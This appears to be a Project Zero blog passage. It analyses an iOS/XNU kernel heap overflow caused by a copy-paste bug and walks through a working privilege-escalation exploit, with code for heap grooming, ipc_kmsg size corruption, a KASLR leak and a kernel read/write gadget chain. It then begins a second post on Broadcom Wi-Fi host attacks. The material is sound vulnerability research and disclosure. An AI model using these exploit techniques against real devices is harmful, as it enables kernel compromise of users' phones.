The mach trap entry code will pack the arguments passed to that trap by userspace into this structure:
 struct mach_voucher_extract_attr_recipe_args {    PAD_ARG_(mach_port_name_t, voucher_name);    PAD_ARG_(mach_voucher_attr_key_t, key);    PAD_ARG_(mach_voucher_attr_raw_recipe_t, recipe);    PAD_ARG_(user_addr_t, recipe_size);  };
A pointer to that structure will then be passed to the trap implementation as the first argument. It’s worth noting at this point that adding a new syscall like this means it can be called from every sandboxed process on the system. Up until you reach a mandatory access control hook (and there are none here) the sandbox provides no protection.
Let’s walk through the trap code:
kern_return_tmach_voucher_extract_attr_recipe_trap(  struct mach_voucher_extract_attr_recipe_args *args){  ipc_voucher_t voucher = IV_NULL;  kern_return_t kr = KERN_SUCCESS;  mach_msg_type_number_t sz = 0;
 if (copyin(args->recipe_size, (void *)&sz, sizeof(sz)))    return KERN_MEMORY_ERROR;
copyin has similar semantics to copy_from_user on Linux. This copies 4 bytes from the userspace pointer args->recipe_size to the sz variable on the kernel stack, ensuring that the whole source range really is in userspace and returning an error code if the source range either wasn’t completely mapped or pointed to kernel memory. The attacker now controls sz.
 if (sz > MACH_VOUCHER_ATTR_MAX_RAW_RECIPE_ARRAY_SIZE)    return MIG_ARRAY_TOO_LARGE;
mach_msg_type_number_t is a 32-bit unsigned type so sz has to be less than or equal to MACH_VOUCHER_ATTR_MAX_RAW_RECIPE_ARRAY_SIZE (5120) to continue.
 voucher = convert_port_name_to_voucher(args->voucher_name);  if (voucher == IV_NULL)    return MACH_SEND_INVALID_DEST;
convert_port_name_to_voucher looks up the args->voucher_name mach port name in the calling task’s mach port namespace and checks whether it names an ipc_voucher object, returning a reference to the voucher if it does. So we need to provide a valid voucher port as voucher_name to continue past here.
 if (sz < MACH_VOUCHER_TRAP_STACK_LIMIT) {    /* keep small recipes on the stack for speed */    uint8_t krecipe[sz];    if (copyin(args->recipe, (void *)krecipe, sz)) {      kr = KERN_MEMORY_ERROR;        goto done;    }    kr = mach_voucher_extract_attr_recipe(voucher,             args->key, (mach_voucher_attr_raw_recipe_t)krecipe, &sz);
   if (kr == KERN_SUCCESS && sz > 0)      kr = copyout(krecipe, (void *)args->recipe, sz);  }
If sz was less than MACH_VOUCHER_TRAP_STACK_LIMIT (256) then this allocates a small variable-length-array on the kernel stack and copies in sz bytes from the userspace pointer in args->recipe to that VLA. The code then calls the target mach_voucher_extract_attr_recipe method before calling copyout (which takes its kernel and userspace arguments the other way round to copyin) to copy the results back to userspace. All looks okay, so let’s take a look at what happens if sz was too big to let the recipe be “kept on the stack for speed”:
 else {    uint8_t *krecipe = kalloc((vm_size_t)sz);    if (!krecipe) {      kr = KERN_RESOURCE_SHORTAGE;      goto done;    }
   if (copyin(args->recipe, (void *)krecipe, args->recipe_size)) {      kfree(krecipe, (vm_size_t)sz);      kr = KERN_MEMORY_ERROR;      goto done;    }
The code continues on but let’s stop here and look really carefully at that snippet. It calls kalloc to make an sz-byte sized allocation on the kernel heap and assigns the address of that allocation to krecipe. It then calls copyin to copy args->recipe_size bytes from the args->recipe userspace pointer to the krecipe kernel heap buffer.
If you didn’t spot the bug yet, go back up to the start of the code snippets and read through them again. This is a case of a bug that’s so completely wrong that at first glance it actually looks correct!
To explain the bug it’s worth donning our detective hat and trying to work out what happened to cause such code to be written. This is just conjecture but I think it’s quite plausible.
a recipe for copypastaRight above the mach_voucher_extract_attr_recipe_trap method in mach_kernelrpc.c there’s the code for host_create_mach_voucher_trap, another mach trap.
These two functions look very similar. They both have a branch for a small and large input size, with the same /* keep small recipes on the stack for speed */ comment in the small path and they both make a kernel heap allocation in the large path.
It’s pretty clear that the code for mach_voucher_extract_attr_recipe_trap has been copy-pasted from host_create_mach_voucher_trap then updated to reflect the subtle difference in their prototypes. That difference is that the size argument to host_create_mach_voucher_trap is an integer but the size argument to mach_voucher_extract_attr_recipe_trap is a pointer to an integer.
This means that mach_voucher_extract_attr_recipe_trap requires an extra level of indirection; it first needs to copyin the size before it can use it. Even more confusingly the size argument in the original function was called recipes_size and in the newer function it’s called recipe_size (one fewer ‘s’.)
Here’s the relevant code from the two functions, the first snippet is fine and the second has the bug:
host_create_mach_voucher_trap:
if (copyin(args->recipes, (void *)krecipes, args->recipes_size)) {  kfree(krecipes, (vm_size_t)args->recipes_size);  kr = KERN_MEMORY_ERROR;  goto done; }
mach_voucher_extract_attr_recipe_trap:
 if (copyin(args->recipe, (void *)krecipe, args->recipe_size)) {    kfree(krecipe, (vm_size_t)sz);    kr = KERN_MEMORY_ERROR;    goto done;  }
My guess is that the developer copy-pasted the code for the entire function then tried to add the extra level of indirection but forgot to change the third argument to the copyin call shown above. They built XNU and looked at the compiler error messages. XNU builds with clang, which gives you fancy error messages like this:
error: no member named 'recipes_size' in 'struct mach_voucher_extract_attr_recipe_args'; did you mean 'recipe_size'?if (copyin(args->recipes, (void *)krecipes, args->recipes_size)) {                                                  ^~~~~~~~~~~~                                                  recipe_size
Clang assumes that the developer has made a typo and typed an extra ‘s’. Clang doesn’t realize that its suggestion is semantically totally wrong and will introduce a critical memory corruption issue. I think that the developer took clang’s suggestion, removed the ‘s’, rebuilt and the code compiled without errors.
Building primitivescopyin on iOS will fail if the size argument is greater than 0x4000000. Since recipes_size also needs to be a valid userspace pointer this means we have to be able to map an address that low. From a 64-bit iOS app we can do this by giving the pagezero_size linker option a small value. We can completely control the size of the copy by ensuring that our data is aligned right up to the end of a page and then unmapping the page after it. copyin will fault when the copy reaches unmapped source page and stop.

If the copyin fails the kalloced buffer will be immediately freed.
Putting all the bits together we can make a kalloc heap allocation of between 256 and 5120 bytes and overflow out of it as much as we want with completely controlled data.
When I’m working on a new exploit I spend a lot of time looking for new primitives; for example objects  allocated on the heap which if I could overflow into it I could cause a chain of interesting things to happen. Generally interesting means if I corrupt it I can use it to build a better primitive. Usually my end goal is to chain these primitives to get an arbitrary, repeatable and reliable memory read/write.
To this end one style of object I’m always on the lookout for is something that contains a length or size field which can be corrupted without having to fully corrupt any pointers. This is usually an interesting target and warrants further investigation.
For anyone who has ever written a browser exploit this will be a familiar construct!
ipc_kmsgReading through the XNU code for interesting looking primitives I came across struct ipc_kmsg:
struct ipc_kmsg {  mach_msg_size_t            ikm_size;  struct ipc_kmsg            *ikm_next;  struct ipc_kmsg            *ikm_prev;  mach_msg_header_t          *ikm_header;  ipc_port_t                 ikm_prealloc;  ipc_port_t                 ikm_voucher;  mach_msg_priority_t        ikm_qos;  mach_msg_priority_t        ikm_qos_override  struct ipc_importance_elem *ikm_importance;  queue_chain_t              ikm_inheritance;};
This is a structure which has a size field that can be corrupted without needing to know any pointer values. How is the ikm_size field used?
Looking for cross references to ikm_size in the code we can see it’s only used in a handful of places:
void ipc_kmsg_free(ipc_kmsg_t kmsg);
This function uses kmsg->ikm_size to free the kmsg back to the correct kalloc zone. The zone allocator will detect frees to the wrong zone and panic so we’ll have to be careful that we don’t free a corrupted ipc_kmsg without first fixing up the size.
This macro is used to set the ikm_size field:
#define ikm_init(kmsg, size)  \MACRO_BEGIN                   \ (kmsg)->ikm_size = (size);   \
This macro uses the ikm_size field to set the ikm_header pointer:
#define ikm_set_header(kmsg, mtsize)                       \ MACRO_BEGIN                                                \ (kmsg)->ikm_header = (mach_msg_header_t *)                 \ ((vm_offset_t)((kmsg) + 1) + (kmsg)->ikm_size - (mtsize)); \MACRO_END
That macro is using the ikm_size field to set the ikm_header field such that the message is aligned to the end of the buffer; this could be interesting.
Finally there’s a check in ipc_kmsg_get_from_kernel:
 if (msg_and_trailer_size > kmsg->ikm_size - max_desc) {    ip_unlock(dest_port);    return MACH_SEND_TOO_LARGE;  }
That’s using the ikm_size field to ensure that there’s enough space in the ikm_kmsg buffer for a message.
It looks like if we corrupt the ikm_size field we’ll be able to make the kernel believe that a message buffer is bigger than it really is which will almost certainly lead to message contents being written out of bounds. But haven’t we just turned a kernel heap overflow into... another kernel heap overflow? The difference this time is that a corrupted ipc_kmsg might also let me read memory out of bounds. This is why corrupting the ikm_size field could be an interesting thing to investigate.
It’s about sending a messageikm_kmsg structures are used to hold in-transit mach messages. When userspace sends a mach message we end up in ipc_kmsg_alloc. If the message is small (less than IKM_SAVED_MSG_SIZE) then the code will first look in a cpu-local cache for recently freed ikm_kmsg structures. If none are found it will allocate a new cacheable message from the dedicated ipc.kmsg zalloc zone.
Larger messages bypass this cache are are directly allocated by kalloc, the general purpose kernel heap allocator. After allocating the buffer the structure is immediately initialized using the two macros we saw:
 kmsg = (ipc_kmsg_t)kalloc(ikm_plus_overhead(max_expanded_size));...    if (kmsg != IKM_NULL) {    ikm_init(kmsg, max_expanded_size);    ikm_set_header(kmsg, msg_and_trailer_size);  }
 return(kmsg);
Unless we’re able to corrupt the ikm_size field in between those two macros the most we’d be able to do is cause the message to be freed to the wrong zone and immediately panic. Not so useful.
But ikm_set_header is called in one other place: ipc_kmsg_get_from_kernel.
This function is only used when the kernel sends a real mach message; it’s not used for sending replies to kernel MIG apis for example. The function’s comment explains more:
* Routine: ipc_kmsg_get_from_kernel * Purpose: * First checks for a preallocated message * reserved for kernel clients.  If not found - * allocates a new kernel message buffer. * Copies a kernel message to the message buffer.
Using the mach_port_allocate_full method from userspace we can allocate a new mach port which has a single preallocated ikm_kmsg buffer of a controlled size. The intended use-case is to allow userspace to receive critical messages without the kernel having to make a heap allocation. Each time the kernel sends a real mach message it first checks whether the port has one of these preallocated buffers and it’s not currently in-use. We then reach the following code (I’ve removed the locking and 32-bit only code for brevity):
 if (IP_VALID(dest_port) && IP_PREALLOC(dest_port)) {    mach_msg_size_t max_desc = 0;        kmsg = dest_port->ip_premsg;    if (ikm_prealloc_inuse(kmsg)) {      ip_unlock(dest_port);      return MACH_SEND_NO_BUFFER;    }
   if (msg_and_trailer_size > kmsg->ikm_size - max_desc) {      ip_unlock(dest_port);      return MACH_SEND_TOO_LARGE;    }    ikm_prealloc_set_inuse(kmsg, dest_port);    ikm_set_header(kmsg, msg_and_trailer_size);    ip_unlock(dest_port);...    (void) memcpy((void *) kmsg->ikm_header, (const void *) msg, size);
This code checks whether the message would fit (trusting kmsg->ikm_size), marks the preallocated buffer as in-use, calls the ikm_set_header macro to which sets ikm_header such that the message will align to the end the of the buffer and finally calls memcpy to copy the message into the ipc_kmsg.

This means that if we can corrupt the ikm_size field of a preallocated ipc_kmsg and make it appear larger than it is then when the kernel sends a message it will write the message contents off the end of the preallocate message buffer.
ikm_header is also used in the mach message receive path, so when we dequeue the message it will also read out of bounds. If we could replace whatever was originally after the message buffer with data we want to read we could then read it back as part of the contents of the message.
This new primitive we’re building is more powerful in another way: if we get this right we’ll be able to read and write out of bounds in a repeatable, controlled way without having to trigger a bug each time.
Exceptional behaviourThere’s one difficulty with preallocated messages: because they’re only used when the kernel send a message to us we can’t just send a message with controlled data and get it to use the preallocated ipc_kmsg. Instead we need to persuade the kernel to send us a message with data we control, this is much harder!
There are only and handful of places where the kernel actually sends userspace a mach message. There are various types of notification messages like IODataQueue data-available notifications, IOServiceUserNotifications and no-senders notifications. These usually only contains a small amount of user-controlled data. The only message types sent by the kernel which seem to contain a decent amount of user-controlled data are exception messages.
When a thread faults (for example by accessing unallocated memory or calling a software breakpoint instruction) the kernel will send an exception message to the thread’s registered exception handler port.
If a thread doesn’t have an exception handler port the kernel will try to send the message to the task’s exception handler port and if that also fails the exception message will be delivered to to global host exception port. A thread can normally set its own exception port but setting the host exception port is a privileged action.
routine thread_set_exception_ports(         thread         : thread_act_t;         exception_mask : exception_mask_t;         new_port       : mach_port_t;         behavior       : exception_behavior_t;         new_flavor     : thread_state_flavor_t);
This is the MIG definition for thread_set_exception_ports. new_port should be a send right to the new exception port. exception_mask lets us restrict the types of exceptions we want to handle. behaviour defines what type of exception message we want to receive and new_flavor lets us specify what kind of process state we want to be included in the message.
Passing an exception_mask of EXC_MASK_ALL, EXCEPTION_STATE for behavior and ARM_THREAD_STATE64 for new_flavor means that the kernel will send an exception_raise_state message to the exception port we specify whenever the specified thread faults. That message will contain the state of all the ARM64 general purposes registers, and that’s what we’ll use to get controlled data written off the end of the ipc_kmsg buffer!
Some assembly required...In our iOS XCode project we can added a new assembly file and define a function load_regs_and_crash:
.text.globl  _load_regs_and_crash.align  2_load_regs_and_crash:mov x30, x0ldp x0, x1, [x30, 0]ldp x2, x3, [x30, 0x10]ldp x4, x5, [x30, 0x20]ldp x6, x7, [x30, 0x30]ldp x8, x9, [x30, 0x40]ldp x10, x11, [x30, 0x50]ldp x12, x13, [x30, 0x60]ldp x14, x15, [x30, 0x70]ldp x16, x17, [x30, 0x80]ldp x18, x19, [x30, 0x90]ldp x20, x21, [x30, 0xa0]ldp x22, x23, [x30, 0xb0]ldp x24, x25, [x30, 0xc0]ldp x26, x27, [x30, 0xd0]ldp x28, x29, [x30, 0xe0]brk 0.align  3
This function takes a pointer to a 240 byte buffer as the first argument then assigns each of the first 30 ARM64 general-purposes registers values from that buffer such that when it triggers a software interrupt via brk 0 and the kernel sends an exception message that message contains the bytes from the input buffer in the same order.
We’ve now got a way to get controlled data in a message which will be sent to a preallocated port, but what value should we overwrite the ikm_size with to get the controlled portion of the message to overlap with the start of the following heap object? It’s possible to determine this statically, but it would be much easier if we could just use a kernel debugger and take a look at what happens. However iOS only runs on very locked-down hardware with no supported way to do kernel debugging.
I’m going to build my own kernel debugger (with printfs and hexdumps)A proper debugger has two main features: breakpoints and memory peek/poke. Implementing breakpoints is a lot of work but we can still build a meaningful kernel debugging environment just using kernel memory access.
There’s a bootstrapping problem here; we need a kernel exploit which gives us kernel memory access in order to develop our kernel exploit to give us kernel memory access!  In December I published the mach_portal iOS kernel exploit which gives you kernel memory read/write and as part of that I wrote a handful of kernel introspections functions which allowed you to find process task structures and lookup mach port objects by name. We can build one more level on that and dump the kobject pointer of a mach port.
The first version of this new exploit was developed inside the mach_portal xcode project so I could reuse all the code. After everything was working I ported it from iOS 10.1.1 to iOS 10.2.
Inside mach_portal I was able to find the address of an preallocated port buffer like this:
 // allocate an ipc_kmsg:  kern_return_t err;  mach_port_qos_t qos = {0};  qos.prealloc = 1;  qos.len = size;    mach_port_name_t name = MACH_PORT_NULL;    err = mach_port_allocate_full(mach_task_self(),                                MACH_PORT_RIGHT_RECEIVE,                                MACH_PORT_NULL,                                &qos,                                &name);
 uint64_t port = get_port(name);  uint64_t prealloc_buf = rk64(port+0x88);  printf("0x%016llx,\n", prealloc_buf);
get_port was part of the mach_portal exploit and is defined like this:
uint64_t get_port(mach_port_name_t port_name){  return proc_port_name_to_port_ptr(our_proc, port_name);}
uint64_t proc_port_name_to_port_ptr(uint64_t proc, mach_port_name_t port_name) {  uint64_t ports = get_proc_ipc_table(proc);  uint32_t port_index = port_name >> 8;  uint64_t port = rk64(ports + (0x18*port_index)); //ie_object  return port;}
uint64_t get_proc_ipc_table(uint64_t proc) {  uint64_t task_t = rk64(proc + struct_proc_task_offset);  uint64_t itk_space = rk64(task_t + struct_task_itk_space_offset);  uint64_t is_table = rk64(itk_space + struct_ipc_space_is_table_offset);  return is_table;}
These code snippets are using the rk64() function provided by the mach_portal exploit which reads kernel memory via the kernel task port.
I used this method with some trial and error to determine the correct value to overwrite ikm_size to be able to align the controlled portion of an exception message with the start of the next heap object.
get-where-whatThe final piece of the puzzle is the ability know where controlled data is; rather than write-what-where we want to get where what is.
One way to achieve this in the context of a local privilege escalation exploit is to place this kind of data in userspace but hardware mitigations like SMAP on x86 and the AMCC hardware on iPhone 7 make this harder. Therefore we’ll construct a new primitive to find out where our ipc_kmsg buffer is in kernel memory.
One aspect I haven’t touched on up until now is how to get the ipc_kmsg allocation next to the buffer we’ll overflow out of. Stefan Esser has covered the evolution of the zalloc heap for the last few years in a series of conference talks, the latest talk has details of the zone freelist randomization.
Whilst experimenting with the heap behaviour using the introspection techniques described above I noticed that some size classes would actually still give you close to linear allocation behavior (later allocations are contiguous.) It turns out this is due to the lower-level allocator which zalloc gets pages from; by exhausting a particular zone we can force zalloc to fetch new pages and if our allocation size is close to the page size we’ll just get that page back immediately.
This means we can use code like this:
 int prealloc_size = 0x900; // kalloc.4096    for (int i = 0; i < 2000; i++){    prealloc_port(prealloc_size);  }    // these will be contiguous now, convenient!  mach_port_t holder = prealloc_port(prealloc_size);  mach_port_t first_port = prealloc_port(prealloc_size);  mach_port_t second_port = prealloc_port(prealloc_size);  to get a heap layout like this:

This is not completely reliable; for devices with more RAM you’ll need to increase the iteration count for the zone exhaustion loop. It’s not a perfect technique but works perfectly well enough for a research tool.
We can now free the holder port; trigger the overflow which will reuse the slot where holder was and overflow into first_port then grab the slot again with another holder port:
 // free the holder:  mach_port_destroy(mach_task_self(), holder);
 // reallocate the holder and overflow out of it  uint64_t overflow_bytes[] = {0x1104,0,0,0,0,0,0,0};  do_overflow(0x1000, 64, overflow_bytes);    // grab the holder again  holder = prealloc_port(prealloc_size);

The overflow has changed the ikm_size field of the preallocated ipc_kmsg belonging to first port to 0x1104.
After the ipc_kmsg structure has been filled in by ipc_get_kmsg_from_kernel it will be enqueued into the target port’s queue of pending messages by ipc_kmsg_enqueue:
void ipc_kmsg_enqueue(ipc_kmsg_queue_t queue,                      ipc_kmsg_t       kmsg){  ipc_kmsg_t first = queue->ikmq_base;  ipc_kmsg_t last;
 if (first == IKM_NULL) {    queue->ikmq_base = kmsg;    kmsg->ikm_next = kmsg;    kmsg->ikm_prev = kmsg;  } else {    last = first->ikm_prev;    kmsg->ikm_next = first;    kmsg->ikm_prev = last;    first->ikm_prev = kmsg;    last->ikm_next = kmsg;  }}
If the port has pending messages the ikm_next and ikm_prev fields of the ipc_kmsg form a doubly-linked list of pending messages. But if the port has no pending messages then ikm_next and ikm_prev are both set to point back to kmsg itself. The following interleaving of messages sends and receives will allow us use this fact to read back the address of the second ipc_kmsg buffer:
 uint64_t valid_header[] = {0xc40, 0, 0, 0, 0, 0, 0, 0};  send_prealloc_msg(first_port, valid_header, 8);    // send a message to the second port  // writing a pointer to itself in the prealloc buffer  send_prealloc_msg(second_port, valid_header, 8);    // receive on the first port, reading the header of the second:  uint64_t* buf = receive_prealloc_msg(first_port);    // this is the address of second port  kernel_buffer_base = buf[1];

Here’s the implementation of send_prealloc_msg:
void send_prealloc_msg(mach_port_t port, uint64_t* buf, int n) {  struct thread_args* args = malloc(sizeof(struct thread_args));  memset(args, 0, sizeof(struct thread_args));  memcpy(args->buf, buf, n*8);    args->exception_port = port;    // start a new thread passing it the buffer and the exception port  pthread_t t;  pthread_create(&t, NULL, do_thread, (void*)args);    // associate the pthread_t with the port  // so that we can join the correct pthread  // when we receive the exception message and it exits:  kern_return_t err = mach_port_set_context(mach_task_self(),                                            port,                                            (mach_port_context_t)t);
 // wait until the message has actually been sent:  while(!port_has_message(port)){;}}
Remember that to get the controlled data into port’s preallocated ipc_kmsg we need the kernel to send the exception message to it, so send_prealloc_msg actually has to cause that exception. It allocates a struct thread_args which contains a copy of the controlled data we want in the message and the target port then it starts a new thread which will call do_thread:
void* do_thread(void* arg) {  struct thread_args* args = (struct thread_args*)arg;  uint64_t buf[32];  memcpy(buf, args->buf, sizeof(buf));    kern_return_t err;  err = thread_set_exception_ports(mach_thread_self(),                                   EXC_MASK_ALL,                                   args->exception_port,                                   EXCEPTION_STATE,                                   ARM_THREAD_STATE64);  free(args);    load_regs_and_crash(buf);  return NULL;}
do_thread copies the controlled data from the thread_args structure to a local buffer then sets the target port as this thread’s exception handler. It frees the arguments structure then calls load_regs_and_crash which is the assembler stub that copies the buffer into the first 30 ARM64 general purpose registers and triggers a software breakpoint.
At this point the kernel’s interrupt handler will call exception_deliver which will look up the thread’s exception port and call the MIG mach_exception_raise_state method which will serialize the crashing thread’s register state into a MIG message and call mach_msg_rpc_from_kernel_body which will grab the exception port’s preallocated ipc_kmsg, trust the ikm_size field and use it to align the sent message to what it believes to be the end of the buffer:

In order to actually read data back we need to receive the exception message. In this case we got the kernel to send a message to the first port which had the effect of writing a valid header over the second port. Why use a memory corruption primitive to overwrite the next message’s header with the same data it already contains?
Note that if we just send the message and immediately receive it we’ll read back what we wrote. In order to read back something interesting we have to change what’s there. We can do that by sending a message to the second port after we’ve sent the message to the first port but before we’ve received it.
We observed before that if a port’s message queue is empty when a message is enqueued the ikm_next field will point back to the message itself. So by sending a message to second_port (overwriting it’s header with one what makes the ipc_kmsg still be valid and unused) then reading back the message sent to first port we can determine the address of the second port’s ipc_kmsg buffer.
read/write to arbitrary read/writeWe’ve turned our single heap overflow into the ability to reliably overwrite and read back the contents of a 240 byte region after the first_port ipc_kmsg object as often as we want. We also know where that region is in the kernel’s virtual address space. The final step is to turn that into the ability to read and write arbitrary kernel memory.
For the mach_portal exploit I went straight for the kernel task port object. This time I chose to go a different path and build on a neat trick I saw in the Pegasus exploit detailed in the Lookout writeup.
Whoever developed that exploit had found that the IOKit Serializer::serialize method is a very neat gadget that lets you turn the ability to call a function with one argument that points to controlled data into the ability to call another controlled function with two completely controlled arguments.
In order to use this we need to be able to call a controlled address passing a pointer to controlled data. We also need to know the address of OSSerializer::serialize.
Let’s free second_port and reallocate an IOKit userclient there:
 // send another message on first  // writing a valid, safe header back over second  send_prealloc_msg(first_port, valid_header, 8);    // free second and get it reallocated as a userclient:  mach_port_deallocate(mach_task_self(), second_port);  mach_port_destroy(mach_task_self(), second_port);    mach_port_t uc = alloc_userclient();    // read back the start of the userclient buffer:  buf = receive_prealloc_msg(first_port);
 // save a copy of the original object:  memcpy(legit_object, buf, sizeof(legit_object));    // this is the vtable for AGXCommandQueue  uint64_t vtable = buf[0];
alloc_userclient allocates user client type 5 of the AGXAccelerator IOService which is an AGXCommandQueue object. IOKit’s default operator new uses kalloc and AGXCommandQueue is 0xdb8 bytes so it will also use the kalloc.4096 zone and reuse the memory just freed by the second_port ipc_kmsg.
Note that we sent another message with a valid header to first_port which overwrote second_port’s header with a valid header. This is so that after second_port is freed and the memory reused for the user client we can dequeue the message from first_port and read back the first 240 bytes of the AGXCommandQueue object. The first qword is a pointer to the AGXCommandQueue’s vtable, using this we can determine the KASLR slide thus work out the address of OSSerializer::serialize.
Calling any IOKit MIG method on the AGXCommandQueue userclient will likely result in at least three virtual calls: ::retain() will be called by iokit_lookup_connect_port by the MIG intran for the userclient port. This method also calls ::getMetaClass(). Finally the MIG wrapper will call iokit_remove_connect_reference which will call ::release().
Since these are all C++ virtual methods they will pass the this pointer as the first (implicit) argument meaning that we should be able to fulfil the requirement to be able to use the OSSerializer::serialize gadget. Let’s look more closely at exactly how that works:
class OSSerializer : public OSObject{  OSDeclareDefaultStructors(OSSerializer)
 void * target;  void * ref;  OSSerializerCallback callback;
 virtual bool serialize(OSSerialize * serializer) const;};
bool OSSerializer::serialize( OSSerialize * s ) const{  return( (*callback)(target, ref, s) );}
It’s clearer what’s going on if we look as the disassembly of OSSerializer::serialize:
; OSSerializer::serialize(OSSerializer *__hidden this, OSSerialize *)
MOV  X8, X1LDP  X1, X3, [X0,#0x18] ; load X1 from [X0+0x18] and X3 from [X0+0x20]LDR  X9, [X0,#0x10]     ; load X9 from [X0+0x10]MOV  X0, X9MOV  X2, X8BR   X3                 ; call [X0+0x20] with X0=[X0+0x10] and X1=[X0+0x18]
Since we have read/write access to the first 240 bytes of the AGXCommandQueue userclient and we know where it is in memory we can replace it with the following fake object which will turn a virtual call to ::release into a call to an arbitrary function pointer with two controlled arguments:

We’ve redirected the vtable pointer to point back to this object so we can interleave the vtable entries we need along with the data. We now just need one more primitive on top of this to turn an arbitrary function call with two controlled arguments into an arbitrary memory read/write.
Functions like copyin and copyout are the obvious candidates as they will handle any complexities involved in copying across the user/kernel boundary but they both take three arguments: source, destination and size and we can only completely control two.
However since we already have the ability to read and write this fake object from userspace we can actually just copy values to and from this kernel buffer rather than having to copy to and from userspace directly. This means we can expand our search to any memory copying functions like memcpy. Of course memcpy, memmove and bcopy all also take three arguments so what we need is a wrapper around one of those which passes a fixed size.
Looking through the cross-references to those functions we find uuid_copy:
; uuid_copy(uuid_t dst, const uuid_t src)MOV  W2, #0x10 ; sizeB    _memmove
This function is just simple wrapper around memmove which always passes a fixed size of 16-bytes. Let’s integrate that final primitive into the serializer gadget:

To make the read into a write we just swap the order of the arguments to copy from an arbitrary address into our fake userclient object then receive the exception message to read the read data.
You can download my exploit for iOS 10.2 on iPod 6G here: https://bugs.chromium.org/p/project-zero/issues/detail?id=1004#c4
This bug was also independently discovered and exploited by Marco Grassi and qwertyoruiopz, check out their code to see a different approach to exploiting this bug which also uses mach ports.
Critical code should be criticisedEvery developer makes mistakes and they’re a natural part of the software development process (especially when the compiler is egging you on!). However, brand new kernel code on the 1B+ devices running XNU deserves special attention. In my opinion this bug was a clear failure of the code review processes in place at Apple and I hope bugs and writeups like these are taken seriously and some lessons are learnt from them.
Perhaps most importantly: I think this bug would have been caught in development if the code had any tests. As well as having a critical security bug the code just doesn’t work at all for a recipe with a size greater than 256. On MacOS such a test would immediately kernel panic. I find it consistently surprising that the coding standards for such critical codebases don’t enforce the development of even basic regression tests.
XNU is not alone in this, it’s a common story across many codebases. For example LG shipped an Android kernel with a new custom syscall containing a trivial unbounded strcpy that was triggered by Chrome’s normal operation and for extra irony the custom syscall collided with the syscall number for sys_seccomp, the exact feature Chrome were trying to add support for to prevent such issues from being exploitable.
Categories: Security

Over The Air: Exploiting Broadcom’s Wi-Fi Stack (Part 2)

Tue, 04/11/2017 - 13:03
Posted by Gal Beniamini, Project Zero
In this blog post we'll continue our journey into gaining remote kernel code execution, by means of Wi-Fi communication alone. Having previously developed a remote code execution exploit giving us control over Broadcom’s Wi-Fi SoC, we are now left with the task of exploiting this vantage point in order to further elevate our privileges into the kernel.

In this post, we’ll explore two distinct avenues for attacking the host operating system. In the first part, we’ll discover and exploit vulnerabilities in the communication protocols between the Wi-Fi firmware and the host, resulting in code execution within the kernel. Along the way, we’ll also observe a curious vulnerability which persisted until quite recently, using which attackers were able to directly attack the internal communication protocols without having to exploit the Wi-Fi SoC in the first place! In the second part, we’ll explore hardware design choices allowing the Wi-Fi SoC in its current configuration to fully control the host without requiring a vulnerability in the first place.
While the vulnerabilities discussed in the first part have been disclosed to Broadcom and are now fixed, the utilisation of hardware components remains as it is, and is currently not mitigated against. We hope that by publishing this research, mobile SoC manufacturers and driver vendors will be encouraged to create more secure designs, allowing a better degree of separation between the Wi-Fi SoC and the application processor.Part 1 - The “Hard” WayThe Communication Channel
As we’ve established in the previous blog post, the Wi-Fi firmware produced by Broadcom is a FullMAC implementation. As such, it’s responsible for handling much of the complexity required for the implementation of 802.11 standards (including the majority of the MLME layer).
Yet, while many of the operations are encapsulated within the Wi-Fi chip’s firmware, some degree of control over the Wi-Fi state machine is required within the host’s operating system. Certain events cannot be handled solely by the Wi-Fi SoC, and must therefore be communicated to the host’s operating system. For example, the host must be notified of the results of a Wi-Fi scan in order to be able to present this information to the user.
In order to facilitate these cases where the host and the Wi-Fi SoC wish to communicate with one another, a special communication channel is required.
However, recall that Broadcom produces a wide range of Wi-Fi SoCs, which may be connected to the host via many different interfaces (including USB, SDIO or even PCIe). This means that relying on the underlying communication interface might require re-implementing the shared communication protocol for each of the supported channels -- quite a tedious task.

Perhaps there’s an easier way? Well, one thing we can always be certain of is that regardless of the communication channel used, the chip must be able to transmit received frames back to the host. Indeed, perhaps for the very same reason, Broadcom chose to piggyback on top of this channel in order to create the communication channel between the SoC and the host.
When the firmware wishes to notify the host of an event, it does so by simply encoding a “special” frame and transmitting it to the host. These frames are marked by a “unique” EtherType value of 0x886C. They do not contain actual received data, but rather encapsulate information about firmware events which must be handled by the host’s driver.

Securing the Channel
Now, let’s switch over the the host’s side. On the host, the driver can logically be divided into several layers. The lower layers deal with the communication interface itself (such as SDIO, PCIe, etc.) and whatever transmission protocol may be tied to it. The higher layers then deal with the reception of frames, and their subsequent processing (if necessary).
First, the upper layers perform some initial processing on the received frames, such as removing encapsulated data which may have been added on-top of it (for example, transmission power indicators added by the PHY module). Then, an important distinction must be made - is this a regular frame that should be simply forwarded to the relevant network interface, or is it in fact an encoded event that the host must handle?
As we’ve just seen, this distinction is easily made! Just take a look at the ethertype and check whether it has the “special” value of 0x886C. If so, handle the encapsulated event and discard the frame.
Or is it?
In fact, there is no guarantee that this ethertype is unused in every single network and by every single device. Incidentally, it seems that the very same ethertype is used for the LARQ protocol used in HPNA chips (initially developed by Epigram, and subsequently purchased by Broadcom).
Regardless of this little oddity - this brings us to our first question: how can the Wi-Fi SoC and host driver distinguish between externally received frames with the 0x886C ethertype (which should be forwarded to the network interface), and internally generated event frames (which should not be received from external sources)?
This is a crucial question; the internal event channel, as we’ll see shortly, is extremely powerful and provides a huge, mostly unaudited, attack surface. If attackers are able to inject frames over-the-air that can subsequently be processed as event frames by the driver, they may very well be able to achieve code execution within the host’s operating system.
Well… Until several months prior to this research (mid 2016), the firmware made no effort to filter these frames. Any frame received as part of the data RX-path, regardless of its ethertype, was simply forwarded blindly to the host. As a result, attackers were able to remotely send frames containing the special 0x886C ethertype, which were then processed by the driver as if they were event frames created by the firmware itself!
So how was this issue addressed? After all, we’ve already established that just filtering the ethertype itself is not sufficient. Observing the differences between the pre- and post- patched versions of the firmware reveals the answer: Broadcom went for a combined patch, targeting both the Wi-Fi SoC’s firmware and the host’s driver.
The patch adds a validation method (is_wlc_event_frame) both to the firmware’s RX path, and to the driver. On the chip’s  side, the validation method is called immediately before transmitting a received frame to the host. If the validation method deems the frame to be an event frame, it is discarded. Otherwise, the frame is forwarded to the driver. Then, the driver calls the exact same verification method on received frames with the 0x886C ethertype, and processes them only if they pass the same validation method. Here is a short schematic detailing this flow:

As long as the validation methods in the driver and the firmware remain identical, externally received frames cannot be processed as events by the driver. So far so good.
